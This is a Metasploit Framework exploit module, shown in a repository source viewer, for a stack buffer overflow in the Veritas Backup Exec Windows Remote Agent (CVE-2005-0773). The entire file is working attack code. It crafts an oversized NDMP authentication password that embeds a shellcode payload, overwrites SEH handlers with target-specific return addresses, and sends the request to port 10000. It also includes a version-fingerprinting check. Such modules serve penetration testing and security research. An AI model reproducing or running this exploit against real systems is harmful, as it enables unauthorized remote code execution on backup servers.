root / modules / exploits / windows / backupexec / remote_agent.rb @ master
History | View | Annotate | Download (3.6 kB)
| 1 |
##
|
|---|---|
| 2 |
# $Id$
|
| 3 |
##
|
| 4 |
|
| 5 |
##
|
| 6 |
# This file is part of the Metasploit Framework and may be subject to
|
| 7 |
# redistribution and commercial restrictions. Please see the Metasploit
|
| 8 |
# web site for more information on licensing and terms of use.
|
| 9 |
# http://metasploit.com/
|
| 10 |
##
|
| 11 |
|
| 12 |
require 'msf/core'
|
| 13 |
|
| 14 |
class Metasploit3 < Msf::Exploit::Remote |
| 15 |
Rank = GreatRanking |
| 16 |
|
| 17 |
include Msf::Exploit::Remote::NDMP |
| 18 |
|
| 19 |
def initialize(info = {}) |
| 20 |
super(update_info(info,
|
| 21 |
'Name' => 'Veritas Backup Exec Windows Remote Agent Overflow', |
| 22 |
'Description' => %q{ |
| 23 |
This module exploits a stack buffer overflow in the Veritas |
| 24 |
BackupExec Windows Agent software. This vulnerability occurs |
| 25 |
when a client authentication request is received with type |
| 26 |
'3' and a long password argument. Reliable execution is |
| 27 |
obtained by abusing the stack buffer overflow to smash a SEH |
| 28 |
pointer. |
| 29 |
},
|
| 30 |
'Author' => [ 'hdm' ], |
| 31 |
'License' => MSF_LICENSE, |
| 32 |
'Version' => '$Revision$', |
| 33 |
'References' =>
|
| 34 |
[ |
| 35 |
[ 'CVE', '2005-0773'], |
| 36 |
[ 'OSVDB', '17624'], |
| 37 |
[ 'BID', '14022'], |
| 38 |
[ 'URL', 'http://www.idefense.com/application/poi/display?id=272&type=vulnerabilities'], |
| 39 |
[ 'URL', 'http://seer.support.veritas.com/docs/276604.htm'], |
| 40 |
], |
| 41 |
'Privileged' => true, |
| 42 |
'DefaultOptions' =>
|
| 43 |
{
|
| 44 |
'EXITFUNC' => 'process', |
| 45 |
}, |
| 46 |
'Payload' =>
|
| 47 |
{
|
| 48 |
'Space' => 1024, |
| 49 |
'BadChars' => "\x00", |
| 50 |
'StackAdjustment' => -3500, |
| 51 |
}, |
| 52 |
'Targets' =>
|
| 53 |
[ |
| 54 |
[ |
| 55 |
'Veritas BE 9.0/9.1/10.0 (All Windows)',
|
| 56 |
{
|
| 57 |
'Platform' => 'win', |
| 58 |
'Rets' => [ 0x0140f8d5, 0x014261b0 ], |
| 59 |
}, |
| 60 |
], |
| 61 |
[ |
| 62 |
'Veritas BE 9.0/9.1/10.0 (Windows 2000)',
|
| 63 |
{
|
| 64 |
'Platform' => 'win', |
| 65 |
'Rets' => [ 0x75022ac4, 0x75022ac4 ], |
| 66 |
}, |
| 67 |
], |
| 68 |
], |
| 69 |
'DefaultTarget' => 0, |
| 70 |
'DisclosureDate' => 'Jun 22 2005')) |
| 71 |
|
| 72 |
register_options( |
| 73 |
[ |
| 74 |
Opt::RPORT(10000) |
| 75 |
], self.class)
|
| 76 |
end
|
| 77 |
|
| 78 |
def check |
| 79 |
info = ndmp_info() |
| 80 |
if (info and info['Version']) |
| 81 |
print_status(" Vendor: #{info['Vendor']}")
|
| 82 |
print_status("Product: #{info['Product']}")
|
| 83 |
print_status("Version: #{info['Version']}")
|
| 84 |
|
| 85 |
if (info['Vendor'] =~ /VERITAS/i and info['Version'] =~ /^(4\.2|5\.1)$/) |
| 86 |
return Exploit::CheckCode::Detected |
| 87 |
end
|
| 88 |
end
|
| 89 |
return Exploit::CheckCode::Safe |
| 90 |
end
|
| 91 |
|
| 92 |
def exploit |
| 93 |
connect |
| 94 |
|
| 95 |
print_status("Trying target #{target.name}...")
|
| 96 |
|
| 97 |
resp = ndmp_recv() |
| 98 |
|
| 99 |
username = 'X' * 512 |
| 100 |
password = rand_text_alphanumeric(8192)
|
| 101 |
|
| 102 |
# Place our payload early in the request and jump backwards into it
|
| 103 |
password[ 3536 - payload.encoded.length, payload.encoded.length] = payload.encoded
|
| 104 |
|
| 105 |
# This offset is required for version 10.0
|
| 106 |
password[3536, 2] = "\xeb\x06" |
| 107 |
password[3540, 4] = [ target['Rets'][1] ].pack('V') |
| 108 |
password[3544, 5] = "\xe9" + [-1037].pack('V') |
| 109 |
|
| 110 |
# This offset is required for version 9.0/9.1
|
| 111 |
password[4524, 2] = "\xeb\x06" |
| 112 |
password[4528, 4] = [ target['Rets'][0] ].pack('V') |
| 113 |
password[4532, 5] = "\xe9" + [-2025].pack('V') |
| 114 |
|
| 115 |
# Create the authentication request
|
| 116 |
auth = [ |
| 117 |
1, # Sequence number |
| 118 |
Time.now.to_i, # Current time |
| 119 |
0, # Message type (request) |
| 120 |
0x901, # Message name (connect_client_auth) |
| 121 |
0, # Reply sequence number |
| 122 |
0, # Error status |
| 123 |
3 # Authentication type |
| 124 |
].pack('NNNNNNN') +
|
| 125 |
[ username.length ].pack('N') + username +
|
| 126 |
[ password.length ].pack('N') + password +
|
| 127 |
[ 4 ].pack('N') |
| 128 |
|
| 129 |
print_status("Sending authentication request...")
|
| 130 |
ndmp_send(auth) |
| 131 |
|
| 132 |
# Attempt to read a reply (this should fail)
|
| 133 |
ndmp_recv() |
| 134 |
|
| 135 |
handler |
| 136 |
disconnect |
| 137 |
end
|
| 138 |
|
| 139 |
end
|